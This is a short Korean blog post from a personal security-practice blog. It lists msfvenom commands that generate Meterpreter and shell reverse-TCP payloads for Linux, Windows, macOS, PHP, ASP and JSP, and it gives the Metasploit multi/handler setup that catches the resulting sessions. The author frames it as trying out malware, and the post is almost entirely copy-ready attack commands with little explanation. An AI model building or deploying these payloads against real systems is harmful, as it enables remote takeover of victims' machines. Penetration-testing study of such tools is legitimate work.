효투의 세상 로딩중...
효투의 세상 로딩중...
반응형

악성프로그램을 직접 코드 하나하나 짜서 만들 능력은 없지만, 베놈과 메타스플로잇을 이용하여 악성프로그램을 만들어

테스트해보고 어떤 일들이 가능한지 알아볼 수 있다.

 

venom 페이로드

# 리눅스
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

# 윈도우
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

# 맥
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

# 리눅스 쉘코드

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

# 윈도우 쉘코드
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

# 맥 쉘코드

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
# PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

# JSP 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

 

메타스플로잇 명령어

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false #이 옵션은 여러 세션이 동시 접속이 가능하도록 한다 
exploit -j -z  # -j 옵션은 백그라운드 실행

run으로 실행해도 무방한 것 같다

# show options 로 설정된 옵션이 제대로 되어있나 확인

 

뿐만 아니라 모바일용 악성앱도 제작이 가능하다

다음 글에 모바일 악성앱 실습을 정리할 예정

반응형
  • hyotwo7658@gmail.com

복사 완료 👍